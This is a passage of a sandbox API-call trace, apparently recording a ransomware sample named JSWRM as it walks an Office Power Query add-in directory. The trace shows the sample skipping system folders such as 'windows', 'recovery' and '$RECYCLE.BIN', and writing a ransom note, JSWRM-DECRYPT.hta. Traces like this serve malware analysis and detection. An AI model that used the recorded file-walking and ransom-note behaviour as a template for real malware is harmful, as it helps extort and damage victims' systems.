lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0123.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x23aa80 [0123.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0123.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.064] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1dbe1c1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1dbe1c1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1dbe1c1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x42040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.064] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.064] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.064] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.064] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.064] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.064] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.064] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.064] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.064] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.064] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0123.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0123.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0123.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0123.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0123.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0123.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.064] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf00d5872, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf00d5872, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbcaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.064] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.064] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.064] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.065] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.065] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.065] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.065] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.065] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.065] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.065] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0123.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0123.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0123.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0123.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ecb8 [0123.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0123.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.065] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf00d5872, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf00d5872, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbcaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0123.065] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0123.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0123.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0123.065] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="es", cAlternateFileName="")) returned 1 [0123.065] lstrcmpiW (lpString1="es", lpString2=".") returned 1 [0123.065] lstrcmpiW (lpString1="es", lpString2="..") returned 1 [0123.065] lstrcmpiW (lpString1="es", lpString2="...") returned 1 [0123.065] lstrcmpiW (lpString1="es", lpString2="windows") returned -1 [0123.066] lstrcmpiW (lpString1="es", lpString2="recovery") returned -1 [0123.066] lstrcmpiW (lpString1="es", lpString2="perflogs") returned -1 [0123.066] lstrcmpiW (lpString1="es", lpString2="documents and settings") returned 1 [0123.066] lstrcmpiW (lpString1="es", lpString2="$RECYCLE.BIN") returned 1 [0123.066] lstrcmpiW (lpString1="es", lpString2="system volume information") returned -1 [0123.066] lstrcmpiW (lpString1="es", lpString2="msocache") returned -1 [0123.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0123.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0123.066] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\es\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\es\\jswrm-decrypt.hta")) returned 0xffffffff [0123.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0123.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0123.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b480 [0123.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b480 | out: hHeap=0x1e0000) returned 1 [0123.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\es\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\es\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.068] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.068] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.069] CloseHandle (hObject=0x338) returned 1 [0123.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0123.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0123.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b480 [0123.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0123.069] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\es\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\es\\jswrm-decrypt.hta")) returned 0x20 [0123.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b480 | out: hHeap=0x1e0000) returned 1 [0123.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.069] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\es\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4004339f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x232140 [0123.069] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.069] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4004339f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.069] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.069] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.070] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4004339f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4004339f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4004339f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.070] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.070] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.070] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.070] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.070] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.070] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.070] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.070] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.070] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.070] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0123.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0123.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0123.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0123.070] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18157e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18157e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1887f3e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.070] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.070] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.070] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.070] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.070] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.070] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.070] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.070] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.071] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.071] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0123.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0123.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0123.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d298, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0123.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0123.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.071] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6e5cc4e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.071] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.071] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.071] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.071] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.071] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.071] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.071] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.071] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 